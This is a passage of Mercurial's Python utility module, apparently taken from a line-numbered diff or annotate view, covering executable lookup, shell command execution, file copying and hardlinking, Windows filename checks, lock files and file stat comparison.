    return (safehasattr(sys, "frozen") or # new py2exe
            safehasattr(sys, "importers") or # old py2exe
            imp.is_frozen(u"__main__")) # tools/freeze
1027
1027
# the location of data files matching the source code
if mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

# point the i18n machinery at the data directory computed above
i18n.setdatapath(datapath)
1036
1036
# cached path of the 'hg' executable; resolved lazily by hgexecutable()
_hgexecutable = None
1038
1038
def hgexecutable():
    """return location of the 'hg' executable.

    Defaults to $HG or 'hg' in the search path.
    """
    if _hgexecutable is None:
        # resolution order: $HG env var, frozen-executable heuristics,
        # a __main__ script literally named 'hg', then the search path
        hg = encoding.environ.get('HG')
        mainmod = sys.modules[pycompat.sysstr('__main__')]
        if hg:
            _sethgexecutable(hg)
        elif mainfrozen():
            if getattr(sys, 'frozen', None) == 'macosx_app':
                # Env variable set by py2app
                _sethgexecutable(encoding.environ['EXECUTABLEPATH'])
            else:
                _sethgexecutable(pycompat.sysexecutable)
        elif (os.path.basename(
            pycompat.fsencode(getattr(mainmod, '__file__', ''))) == 'hg'):
            _sethgexecutable(pycompat.fsencode(mainmod.__file__))
        else:
            exe = findexe('hg') or os.path.basename(sys.argv[0])
            _sethgexecutable(exe)
    return _hgexecutable
1062
1062
def _sethgexecutable(path):
    """set location of the 'hg' executable"""
    # stores into the module-level cache read back by hgexecutable()
    global _hgexecutable
    _hgexecutable = path
1067
1067
def _isstdout(f):
    """Return whether file object ``f`` refers to the process's real stdout.

    Returns a falsy value (the missing-attribute None) when ``f`` has no
    fileno() method at all.
    """
    getfd = getattr(f, 'fileno', None)
    return getfd and getfd() == sys.__stdout__.fileno()
1071
1071
def shellenviron(environ=None):
    """return environ with optional override, useful for shelling out"""
    def tostr(val):
        'convert python object into string that is useful to shell'
        # True -> '1'; None/False -> '0'; everything else via str()
        if val is True:
            return '1'
        if val is None or val is False:
            return '0'
        return str(val)
    env = dict(encoding.environ)
    if environ:
        env.update((key, tostr(value)) for key, value in environ.iteritems())
    env['HG'] = hgexecutable()
    return env
1086
1086
def system(cmd, environ=None, cwd=None, out=None):
    '''enhanced shell command execution.
    run with environment maybe modified, maybe in different dir.

    if out is specified, it is assumed to be a file-like object that has a
    write() method. stdout and stderr will be redirected to out.'''
    # flush our own pending output before the child starts writing
    try:
        stdout.flush()
    except Exception:
        pass
    cmd = quotecommand(cmd)
    env = shellenviron(environ)
    if out is None or _isstdout(out):
        # let the child write directly to our stdout
        rc = subprocess.call(cmd, shell=True, close_fds=closefds,
                             env=env, cwd=cwd)
    else:
        # capture combined stdout/stderr and copy it line by line to out
        proc = subprocess.Popen(cmd, shell=True, close_fds=closefds,
                                env=env, cwd=cwd, stdout=subprocess.PIPE,
                                stderr=subprocess.STDOUT)
        for line in iter(proc.stdout.readline, ''):
            out.write(line)
        proc.wait()
        rc = proc.returncode
    if pycompat.sysplatform == 'OpenVMS' and rc & 1:
        # on OpenVMS a set low status bit is treated as success here
        rc = 0
    return rc
1113
1113
def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            # A traceback exactly one frame deep means the TypeError was
            # raised by the call itself (bad arguments), not from inside
            # the function body; deeper TypeErrors are re-raised as-is.
            frames = traceback.extract_tb(sys.exc_info()[2])
            if len(frames) == 1:
                raise error.SignatureError
            raise

    return check
1125
1125
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}
1140
1140
1141 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1141 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1142 '''copy a file, preserving mode and optionally other stat info like
1142 '''copy a file, preserving mode and optionally other stat info like
1143 atime/mtime
1143 atime/mtime
1144
1144
1145 checkambig argument is used with filestat, and is useful only if
1145 checkambig argument is used with filestat, and is useful only if
1146 destination file is guarded by any lock (e.g. repo.lock or
1146 destination file is guarded by any lock (e.g. repo.lock or
1147 repo.wlock).
1147 repo.wlock).
1148
1148
1149 copystat and checkambig should be exclusive.
1149 copystat and checkambig should be exclusive.
1150 '''
1150 '''
1151 assert not (copystat and checkambig)
1151 assert not (copystat and checkambig)
1152 oldstat = None
1152 oldstat = None
1153 if os.path.lexists(dest):
1153 if os.path.lexists(dest):
1154 if checkambig:
1154 if checkambig:
1155 oldstat = checkambig and filestat.frompath(dest)
1155 oldstat = checkambig and filestat.frompath(dest)
1156 unlink(dest)
1156 unlink(dest)
1157 if hardlink:
1157 if hardlink:
1158 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1158 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1159 # unless we are confident that dest is on a whitelisted filesystem.
1159 # unless we are confident that dest is on a whitelisted filesystem.
1160 try:
1160 try:
1161 fstype = getfstype(os.path.dirname(dest))
1161 fstype = getfstype(os.path.dirname(dest))
1162 except OSError:
1162 except OSError:
1163 fstype = None
1163 fstype = None
1164 if fstype not in _hardlinkfswhitelist:
1164 if fstype not in _hardlinkfswhitelist:
1165 hardlink = False
1165 hardlink = False
1166 if hardlink:
1166 if hardlink:
1167 try:
1167 try:
1168 oslink(src, dest)
1168 oslink(src, dest)
1169 return
1169 return
1170 except (IOError, OSError):
1170 except (IOError, OSError):
1171 pass # fall back to normal copy
1171 pass # fall back to normal copy
1172 if os.path.islink(src):
1172 if os.path.islink(src):
1173 os.symlink(os.readlink(src), dest)
1173 os.symlink(os.readlink(src), dest)
1174 # copytime is ignored for symlinks, but in general copytime isn't needed
1174 # copytime is ignored for symlinks, but in general copytime isn't needed
1175 # for them anyway
1175 # for them anyway
1176 else:
1176 else:
1177 try:
1177 try:
1178 shutil.copyfile(src, dest)
1178 shutil.copyfile(src, dest)
1179 if copystat:
1179 if copystat:
1180 # copystat also copies mode
1180 # copystat also copies mode
1181 shutil.copystat(src, dest)
1181 shutil.copystat(src, dest)
1182 else:
1182 else:
1183 shutil.copymode(src, dest)
1183 shutil.copymode(src, dest)
1184 if oldstat and oldstat.stat:
1184 if oldstat and oldstat.stat:
1185 newstat = filestat.frompath(dest)
1185 newstat = filestat.frompath(dest)
1186 if newstat.isambig(oldstat):
1186 if newstat.isambig(oldstat):
1187 # stat of copied file is ambiguous to original one
1187 # stat of copied file is ambiguous to original one
1188 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1188 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1189 os.utime(dest, (advanced, advanced))
1189 os.utime(dest, (advanced, advanced))
1190 except shutil.Error as inst:
1190 except shutil.Error as inst:
1191 raise Abort(str(inst))
1191 raise Abort(str(inst))
1192
1192
1193 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1193 def copyfiles(src, dst, hardlink=None, progress=lambda t, pos: None):
1194 """Copy a directory tree using hardlinks if possible."""
1194 """Copy a directory tree using hardlinks if possible."""
1195 num = 0
1195 num = 0
1196
1196
1197 gettopic = lambda: hardlink and _('linking') or _('copying')
1197 gettopic = lambda: hardlink and _('linking') or _('copying')
1198
1198
1199 if os.path.isdir(src):
1199 if os.path.isdir(src):
1200 if hardlink is None:
1200 if hardlink is None:
1201 hardlink = (os.stat(src).st_dev ==
1201 hardlink = (os.stat(src).st_dev ==
1202 os.stat(os.path.dirname(dst)).st_dev)
1202 os.stat(os.path.dirname(dst)).st_dev)
1203 topic = gettopic()
1203 topic = gettopic()
1204 os.mkdir(dst)
1204 os.mkdir(dst)
1205 for name, kind in listdir(src):
1205 for name, kind in listdir(src):
1206 srcname = os.path.join(src, name)
1206 srcname = os.path.join(src, name)
1207 dstname = os.path.join(dst, name)
1207 dstname = os.path.join(dst, name)
1208 def nprog(t, pos):
1208 def nprog(t, pos):
1209 if pos is not None:
1209 if pos is not None:
1210 return progress(t, pos + num)
1210 return progress(t, pos + num)
1211 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1211 hardlink, n = copyfiles(srcname, dstname, hardlink, progress=nprog)
1212 num += n
1212 num += n
1213 else:
1213 else:
1214 if hardlink is None:
1214 if hardlink is None:
1215 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1215 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1216 os.stat(os.path.dirname(dst)).st_dev)
1216 os.stat(os.path.dirname(dst)).st_dev)
1217 topic = gettopic()
1217 topic = gettopic()
1218
1218
1219 if hardlink:
1219 if hardlink:
1220 try:
1220 try:
1221 oslink(src, dst)
1221 oslink(src, dst)
1222 except (IOError, OSError):
1222 except (IOError, OSError):
1223 hardlink = False
1223 hardlink = False
1224 shutil.copy(src, dst)
1224 shutil.copy(src, dst)
1225 else:
1225 else:
1226 shutil.copy(src, dst)
1226 shutil.copy(src, dst)
1227 num += 1
1227 num += 1
1228 progress(topic, num)
1228 progress(topic, num)
1229 progress(topic, None)
1229 progress(topic, None)
1230
1230
1231 return hardlink, num
1231 return hardlink, num
1232
1232
1233 _winreservednames = {
1233 _winreservednames = {
1234 'con', 'prn', 'aux', 'nul',
1234 'con', 'prn', 'aux', 'nul',
1235 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1235 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1236 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1236 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1237 }
1237 }
1238 _winreservedchars = ':*?"<>|'
1238 _winreservedchars = ':*?"<>|'
1239 def checkwinfilename(path):
1239 def checkwinfilename(path):
1240 r'''Check that the base-relative path is a valid filename on Windows.
1240 r'''Check that the base-relative path is a valid filename on Windows.
1241 Returns None if the path is ok, or a UI string describing the problem.
1241 Returns None if the path is ok, or a UI string describing the problem.
1242
1242
1243 >>> checkwinfilename(b"just/a/normal/path")
1243 >>> checkwinfilename(b"just/a/normal/path")
1244 >>> checkwinfilename(b"foo/bar/con.xml")
1244 >>> checkwinfilename(b"foo/bar/con.xml")
1245 "filename contains 'con', which is reserved on Windows"
1245 "filename contains 'con', which is reserved on Windows"
1246 >>> checkwinfilename(b"foo/con.xml/bar")
1246 >>> checkwinfilename(b"foo/con.xml/bar")
1247 "filename contains 'con', which is reserved on Windows"
1247 "filename contains 'con', which is reserved on Windows"
1248 >>> checkwinfilename(b"foo/bar/xml.con")
1248 >>> checkwinfilename(b"foo/bar/xml.con")
1249 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1249 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1250 "filename contains 'AUX', which is reserved on Windows"
1250 "filename contains 'AUX', which is reserved on Windows"
1251 >>> checkwinfilename(b"foo/bar/bla:.txt")
1251 >>> checkwinfilename(b"foo/bar/bla:.txt")
1252 "filename contains ':', which is reserved on Windows"
1252 "filename contains ':', which is reserved on Windows"
1253 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1253 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1254 "filename contains '\\x07', which is invalid on Windows"
1254 "filename contains '\\x07', which is invalid on Windows"
1255 >>> checkwinfilename(b"foo/bar/bla ")
1255 >>> checkwinfilename(b"foo/bar/bla ")
1256 "filename ends with ' ', which is not allowed on Windows"
1256 "filename ends with ' ', which is not allowed on Windows"
1257 >>> checkwinfilename(b"../bar")
1257 >>> checkwinfilename(b"../bar")
1258 >>> checkwinfilename(b"foo\\")
1258 >>> checkwinfilename(b"foo\\")
1259 "filename ends with '\\', which is invalid on Windows"
1259 "filename ends with '\\', which is invalid on Windows"
1260 >>> checkwinfilename(b"foo\\/bar")
1260 >>> checkwinfilename(b"foo\\/bar")
1261 "directory name ends with '\\', which is invalid on Windows"
1261 "directory name ends with '\\', which is invalid on Windows"
1262 '''
1262 '''
1263 if path.endswith('\\'):
1263 if path.endswith('\\'):
1264 return _("filename ends with '\\', which is invalid on Windows")
1264 return _("filename ends with '\\', which is invalid on Windows")
1265 if '\\/' in path:
1265 if '\\/' in path:
1266 return _("directory name ends with '\\', which is invalid on Windows")
1266 return _("directory name ends with '\\', which is invalid on Windows")
1267 for n in path.replace('\\', '/').split('/'):
1267 for n in path.replace('\\', '/').split('/'):
1268 if not n:
1268 if not n:
1269 continue
1269 continue
1270 for c in _filenamebytestr(n):
1270 for c in _filenamebytestr(n):
1271 if c in _winreservedchars:
1271 if c in _winreservedchars:
1272 return _("filename contains '%s', which is reserved "
1272 return _("filename contains '%s', which is reserved "
1273 "on Windows") % c
1273 "on Windows") % c
1274 if ord(c) <= 31:
1274 if ord(c) <= 31:
1275 return _("filename contains %r, which is invalid "
1275 return _("filename contains %r, which is invalid "
1276 "on Windows") % c
1276 "on Windows") % c
1277 base = n.split('.')[0]
1277 base = n.split('.')[0]
1278 if base and base.lower() in _winreservednames:
1278 if base and base.lower() in _winreservednames:
1279 return _("filename contains '%s', which is reserved "
1279 return _("filename contains '%s', which is reserved "
1280 "on Windows") % base
1280 "on Windows") % base
1281 t = n[-1]
1281 t = n[-1]
1282 if t in '. ' and n not in '..':
1282 if t in '. ' and n not in '..':
1283 return _("filename ends with '%s', which is not allowed "
1283 return _("filename ends with '%s', which is not allowed "
1284 "on Windows") % t
1284 "on Windows") % t
1285
1285
1286 if pycompat.osname == 'nt':
1286 if pycompat.osname == 'nt':
1287 checkosfilename = checkwinfilename
1287 checkosfilename = checkwinfilename
1288 timer = time.clock
1288 timer = time.clock
1289 else:
1289 else:
1290 checkosfilename = platform.checkosfilename
1290 checkosfilename = platform.checkosfilename
1291 timer = time.time
1291 timer = time.time
1292
1292
1293 if safehasattr(time, "perf_counter"):
1293 if safehasattr(time, "perf_counter"):
1294 timer = time.perf_counter
1294 timer = time.perf_counter
1295
1295
1296 def makelock(info, pathname):
1296 def makelock(info, pathname):
1297 try:
1297 try:
1298 return os.symlink(info, pathname)
1298 return os.symlink(info, pathname)
1299 except OSError as why:
1299 except OSError as why:
1300 if why.errno == errno.EEXIST:
1300 if why.errno == errno.EEXIST:
1301 raise
1301 raise
1302 except AttributeError: # no symlink in os
1302 except AttributeError: # no symlink in os
1303 pass
1303 pass
1304
1304
1305 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1305 ld = os.open(pathname, os.O_CREAT | os.O_WRONLY | os.O_EXCL)
1306 os.write(ld, info)
1306 os.write(ld, info)
1307 os.close(ld)
1307 os.close(ld)
1308
1308
1309 def readlock(pathname):
1309 def readlock(pathname):
1310 try:
1310 try:
1311 return os.readlink(pathname)
1311 return os.readlink(pathname)
1312 except OSError as why:
1312 except OSError as why:
1313 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1313 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1314 raise
1314 raise
1315 except AttributeError: # no symlink in os
1315 except AttributeError: # no symlink in os
1316 pass
1316 pass
1317 fp = posixfile(pathname)
1317 fp = posixfile(pathname)
1318 r = fp.read()
1318 r = fp.read()
1319 fp.close()
1319 fp.close()
1320 return r
1320 return r
1321
1321
1322 def fstat(fp):
1322 def fstat(fp):
1323 '''stat file object that may not have fileno method.'''
1323 '''stat file object that may not have fileno method.'''
1324 try:
1324 try:
1325 return os.fstat(fp.fileno())
1325 return os.fstat(fp.fileno())
1326 except AttributeError:
1326 except AttributeError:
1327 return os.stat(fp.name)
1327 return os.stat(fp.name)
1328
1328
1329 # File system features
1329 # File system features
1330
1330
1331 def fscasesensitive(path):
1331 def fscasesensitive(path):
1332 """
1332 """
1333 Return true if the given path is on a case-sensitive filesystem
1333 Return true if the given path is on a case-sensitive filesystem
1334
1334
1335 Requires a path (like /foo/.hg) ending with a foldable final
1335 Requires a path (like /foo/.hg) ending with a foldable final
1336 directory component.
1336 directory component.
1337 """
1337 """
1338 s1 = os.lstat(path)
1338 s1 = os.lstat(path)
1339 d, b = os.path.split(path)
1339 d, b = os.path.split(path)
1340 b2 = b.upper()
1340 b2 = b.upper()
1341 if b == b2:
1341 if b == b2:
1342 b2 = b.lower()
1342 b2 = b.lower()
1343 if b == b2:
1343 if b == b2:
1344 return True # no evidence against case sensitivity
1344 return True # no evidence against case sensitivity
1345 p2 = os.path.join(d, b2)
1345 p2 = os.path.join(d, b2)
1346 try:
1346 try:
1347 s2 = os.lstat(p2)
1347 s2 = os.lstat(p2)
1348 if s2 == s1:
1348 if s2 == s1:
1349 return False
1349 return False
1350 return True
1350 return True
1351 except OSError:
1351 except OSError:
1352 return True
1352 return True
1353
1353
1354 try:
1354 try:
1355 import re2
1355 import re2
1356 _re2 = None
1356 _re2 = None
1357 except ImportError:
1357 except ImportError:
1358 _re2 = False
1358 _re2 = False
1359
1359
1360 class _re(object):
1360 class _re(object):
1361 def _checkre2(self):
1361 def _checkre2(self):
1362 global _re2
1362 global _re2
1363 try:
1363 try:
1364 # check if match works, see issue3964
1364 # check if match works, see issue3964
1365 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1365 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1366 except ImportError:
1366 except ImportError:
1367 _re2 = False
1367 _re2 = False
1368
1368
1369 def compile(self, pat, flags=0):
1369 def compile(self, pat, flags=0):
1370 '''Compile a regular expression, using re2 if possible
1370 '''Compile a regular expression, using re2 if possible
1371
1371
1372 For best performance, use only re2-compatible regexp features. The
1372 For best performance, use only re2-compatible regexp features. The
1373 only flags from the re module that are re2-compatible are
1373 only flags from the re module that are re2-compatible are
1374 IGNORECASE and MULTILINE.'''
1374 IGNORECASE and MULTILINE.'''
1375 if _re2 is None:
1375 if _re2 is None:
1376 self._checkre2()
1376 self._checkre2()
1377 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1377 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1378 if flags & remod.IGNORECASE:
1378 if flags & remod.IGNORECASE:
1379 pat = '(?i)' + pat
1379 pat = '(?i)' + pat
1380 if flags & remod.MULTILINE:
1380 if flags & remod.MULTILINE:
1381 pat = '(?m)' + pat
1381 pat = '(?m)' + pat
1382 try:
1382 try:
1383 return re2.compile(pat)
1383 return re2.compile(pat)
1384 except re2.error:
1384 except re2.error:
1385 pass
1385 pass
1386 return remod.compile(pat, flags)
1386 return remod.compile(pat, flags)
1387
1387
1388 @propertycache
1388 @propertycache
1389 def escape(self):
1389 def escape(self):
1390 '''Return the version of escape corresponding to self.compile.
1390 '''Return the version of escape corresponding to self.compile.
1391
1391
1392 This is imperfect because whether re2 or re is used for a particular
1392 This is imperfect because whether re2 or re is used for a particular
1393 function depends on the flags, etc, but it's the best we can do.
1393 function depends on the flags, etc, but it's the best we can do.
1394 '''
1394 '''
1395 global _re2
1395 global _re2
1396 if _re2 is None:
1396 if _re2 is None:
1397 self._checkre2()
1397 self._checkre2()
1398 if _re2:
1398 if _re2:
1399 return re2.escape
1399 return re2.escape
1400 else:
1400 else:
1401 return remod.escape
1401 return remod.escape
1402
1402
1403 re = _re()
1403 re = _re()
1404
1404
1405 _fspathcache = {}
1405 _fspathcache = {}
1406 def fspath(name, root):
1406 def fspath(name, root):
1407 '''Get name in the case stored in the filesystem
1407 '''Get name in the case stored in the filesystem
1408
1408
1409 The name should be relative to root, and be normcase-ed for efficiency.
1409 The name should be relative to root, and be normcase-ed for efficiency.
1410
1410
1411 Note that this function is unnecessary, and should not be
1411 Note that this function is unnecessary, and should not be
1412 called, for case-sensitive filesystems (simply because it's expensive).
1412 called, for case-sensitive filesystems (simply because it's expensive).
1413
1413
1414 The root should be normcase-ed, too.
1414 The root should be normcase-ed, too.
1415 '''
1415 '''
1416 def _makefspathcacheentry(dir):
1416 def _makefspathcacheentry(dir):
1417 return dict((normcase(n), n) for n in os.listdir(dir))
1417 return dict((normcase(n), n) for n in os.listdir(dir))
1418
1418
1419 seps = pycompat.ossep
1419 seps = pycompat.ossep
1420 if pycompat.osaltsep:
1420 if pycompat.osaltsep:
1421 seps = seps + pycompat.osaltsep
1421 seps = seps + pycompat.osaltsep
1422 # Protect backslashes. This gets silly very quickly.
1422 # Protect backslashes. This gets silly very quickly.
1423 seps.replace('\\','\\\\')
1423 seps.replace('\\','\\\\')
1424 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1424 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1425 dir = os.path.normpath(root)
1425 dir = os.path.normpath(root)
1426 result = []
1426 result = []
1427 for part, sep in pattern.findall(name):
1427 for part, sep in pattern.findall(name):
1428 if sep:
1428 if sep:
1429 result.append(sep)
1429 result.append(sep)
1430 continue
1430 continue
1431
1431
1432 if dir not in _fspathcache:
1432 if dir not in _fspathcache:
1433 _fspathcache[dir] = _makefspathcacheentry(dir)
1433 _fspathcache[dir] = _makefspathcacheentry(dir)
1434 contents = _fspathcache[dir]
1434 contents = _fspathcache[dir]
1435
1435
1436 found = contents.get(part)
1436 found = contents.get(part)
1437 if not found:
1437 if not found:
1438 # retry "once per directory" per "dirstate.walk" which
1438 # retry "once per directory" per "dirstate.walk" which
1439 # may take place for each patches of "hg qpush", for example
1439 # may take place for each patches of "hg qpush", for example
1440 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1440 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1441 found = contents.get(part)
1441 found = contents.get(part)
1442
1442
1443 result.append(found or part)
1443 result.append(found or part)
1444 dir = os.path.join(dir, part)
1444 dir = os.path.join(dir, part)
1445
1445
1446 return ''.join(result)
1446 return ''.join(result)
1447
1447
1448 def getfstype(dirpath):
1448 def getfstype(dirpath):
1449 '''Get the filesystem type name from a directory (best-effort)
1449 '''Get the filesystem type name from a directory (best-effort)
1450
1450
1451 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1451 Returns None if we are unsure. Raises OSError on ENOENT, EPERM, etc.
1452 '''
1452 '''
1453 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1453 return getattr(osutil, 'getfstype', lambda x: None)(dirpath)
1454
1454
1455 def checknlink(testfile):
1455 def checknlink(testfile):
1456 '''check whether hardlink count reporting works properly'''
1456 '''check whether hardlink count reporting works properly'''
1457
1457
1458 # testfile may be open, so we need a separate file for checking to
1458 # testfile may be open, so we need a separate file for checking to
1459 # work around issue2543 (or testfile may get lost on Samba shares)
1459 # work around issue2543 (or testfile may get lost on Samba shares)
1460 f1, f2, fp = None, None, None
1460 f1, f2, fp = None, None, None
1461 try:
1461 try:
1462 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1462 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1463 suffix='1~', dir=os.path.dirname(testfile))
1463 suffix='1~', dir=os.path.dirname(testfile))
1464 os.close(fd)
1464 os.close(fd)
1465 f2 = '%s2~' % f1[:-2]
1465 f2 = '%s2~' % f1[:-2]
1466
1466
1467 oslink(f1, f2)
1467 oslink(f1, f2)
1468 # nlinks() may behave differently for files on Windows shares if
1468 # nlinks() may behave differently for files on Windows shares if
1469 # the file is open.
1469 # the file is open.
1470 fp = posixfile(f2)
1470 fp = posixfile(f2)
1471 return nlinks(f2) > 1
1471 return nlinks(f2) > 1
1472 except OSError:
1472 except OSError:
1473 return False
1473 return False
1474 finally:
1474 finally:
1475 if fp is not None:
1475 if fp is not None:
1476 fp.close()
1476 fp.close()
1477 for f in (f1, f2):
1477 for f in (f1, f2):
1478 try:
1478 try:
1479 if f is not None:
1479 if f is not None:
1480 os.unlink(f)
1480 os.unlink(f)
1481 except OSError:
1481 except OSError:
1482 pass
1482 pass
1483
1483
1484 def endswithsep(path):
1484 def endswithsep(path):
1485 '''Check path ends with os.sep or os.altsep.'''
1485 '''Check path ends with os.sep or os.altsep.'''
1486 return (path.endswith(pycompat.ossep)
1486 return (path.endswith(pycompat.ossep)
1487 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1487 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1488
1488
1489 def splitpath(path):
1489 def splitpath(path):
1490 '''Split path by os.sep.
1490 '''Split path by os.sep.
1491 Note that this function does not use os.altsep because this is
1491 Note that this function does not use os.altsep because this is
1492 an alternative of simple "xxx.split(os.sep)".
1492 an alternative of simple "xxx.split(os.sep)".
1493 It is recommended to use os.path.normpath() before using this
1493 It is recommended to use os.path.normpath() before using this
1494 function if need.'''
1494 function if need.'''
1495 return path.split(pycompat.ossep)
1495 return path.split(pycompat.ossep)
1496
1496
1497 def gui():
1497 def gui():
1498 '''Are we running in a GUI?'''
1498 '''Are we running in a GUI?'''
1499 if pycompat.sysplatform == 'darwin':
1499 if pycompat.sysplatform == 'darwin':
1500 if 'SSH_CONNECTION' in encoding.environ:
1500 if 'SSH_CONNECTION' in encoding.environ:
1501 # handle SSH access to a box where the user is logged in
1501 # handle SSH access to a box where the user is logged in
1502 return False
1502 return False
1503 elif getattr(osutil, 'isgui', None):
1503 elif getattr(osutil, 'isgui', None):
1504 # check if a CoreGraphics session is available
1504 # check if a CoreGraphics session is available
1505 return osutil.isgui()
1505 return osutil.isgui()
1506 else:
1506 else:
1507 # pure build; use a safe default
1507 # pure build; use a safe default
1508 return True
1508 return True
1509 else:
1509 else:
1510 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1510 return pycompat.osname == "nt" or encoding.environ.get("DISPLAY")
1511
1511
1512 def mktempcopy(name, emptyok=False, createmode=None):
1512 def mktempcopy(name, emptyok=False, createmode=None):
1513 """Create a temporary file with the same contents from name
1513 """Create a temporary file with the same contents from name
1514
1514
1515 The permission bits are copied from the original file.
1515 The permission bits are copied from the original file.
1516
1516
1517 If the temporary file is going to be truncated immediately, you
1517 If the temporary file is going to be truncated immediately, you
1518 can use emptyok=True as an optimization.
1518 can use emptyok=True as an optimization.
1519
1519
1520 Returns the name of the temporary file.
1520 Returns the name of the temporary file.
1521 """
1521 """
1522 d, fn = os.path.split(name)
1522 d, fn = os.path.split(name)
1523 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1523 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1524 os.close(fd)
1524 os.close(fd)
1525 # Temporary files are created with mode 0600, which is usually not
1525 # Temporary files are created with mode 0600, which is usually not
1526 # what we want. If the original file already exists, just copy
1526 # what we want. If the original file already exists, just copy
1527 # its mode. Otherwise, manually obey umask.
1527 # its mode. Otherwise, manually obey umask.
1528 copymode(name, temp, createmode)
1528 copymode(name, temp, createmode)
1529 if emptyok:
1529 if emptyok:
1530 return temp
1530 return temp
1531 try:
1531 try:
1532 try:
1532 try:
1533 ifp = posixfile(name, "rb")
1533 ifp = posixfile(name, "rb")
1534 except IOError as inst:
1534 except IOError as inst:
1535 if inst.errno == errno.ENOENT:
1535 if inst.errno == errno.ENOENT:
1536 return temp
1536 return temp
1537 if not getattr(inst, 'filename', None):
1537 if not getattr(inst, 'filename', None):
1538 inst.filename = name
1538 inst.filename = name
1539 raise
1539 raise
1540 ofp = posixfile(temp, "wb")
1540 ofp = posixfile(temp, "wb")
1541 for chunk in filechunkiter(ifp):
1541 for chunk in filechunkiter(ifp):
1542 ofp.write(chunk)
1542 ofp.write(chunk)
1543 ifp.close()
1543 ifp.close()
1544 ofp.close()
1544 ofp.close()
1545 except: # re-raises
1545 except: # re-raises
1546 try: os.unlink(temp)
1546 try: os.unlink(temp)
1547 except OSError: pass
1547 except OSError: pass
1548 raise
1548 raise
1549 return temp
1549 return temp
1550
1550
1551 class filestat(object):
1551 class filestat(object):
1552 """help to exactly detect change of a file
1552 """help to exactly detect change of a file
1553
1553
1554 'stat' attribute is result of 'os.stat()' if specified 'path'
1554 'stat' attribute is result of 'os.stat()' if specified 'path'
1555 exists. Otherwise, it is None. This can avoid preparative
1555 exists. Otherwise, it is None. This can avoid preparative
1556 'exists()' examination on client side of this class.
1556 'exists()' examination on client side of this class.
1557 """
1557 """
1558 def __init__(self, stat):
1558 def __init__(self, stat):
1559 self.stat = stat
1559 self.stat = stat
1560
1560
1561 @classmethod
1561 @classmethod
1562 def frompath(cls, path):
1562 def frompath(cls, path):
1563 try:
1563 try:
1564 stat = os.stat(path)
1564 stat = os.stat(path)
1565 except OSError as err:
1565 except OSError as err:
1566 if err.errno != errno.ENOENT:
1566 if err.errno != errno.ENOENT:
1567 raise
1567 raise
1568 stat = None
1568 stat = None
1569 return cls(stat)
1569 return cls(stat)
1570
1570
1571 @classmethod
1571 @classmethod
1572 def fromfp(cls, fp):
1572 def fromfp(cls, fp):
1573 stat = os.fstat(fp.fileno())
1573 stat = os.fstat(fp.fileno())
1574 return cls(stat)
1574 return cls(stat)
1575
1575
1576 __hash__ = object.__hash__
1576 __hash__ = object.__hash__
1577
1577
1578 def __eq__(self, old):
1578 def __eq__(self, old):
1579 try:
1579 try:
1580 # if ambiguity between stat of new and old file is
1580 # if ambiguity between stat of new and old file is
1581 # avoided, comparison of size, ctime and mtime is enough
1581 # avoided, comparison of size, ctime and mtime is enough
1582 # to exactly detect change of a file regardless of platform
1582 # to exactly detect change of a file regardless of platform
1583 return (self.stat.st_size == old.stat.st_size and
1583 return (self.stat.st_size == old.stat.st_size and
1584 self.stat.st_ctime == old.stat.st_ctime and
1584 self.stat.st_ctime == old.stat.st_ctime and
1585 self.stat.st_mtime == old.stat.st_mtime)
1585 self.stat.st_mtime == old.stat.st_mtime)
1586 except AttributeError:
1586 except AttributeError:
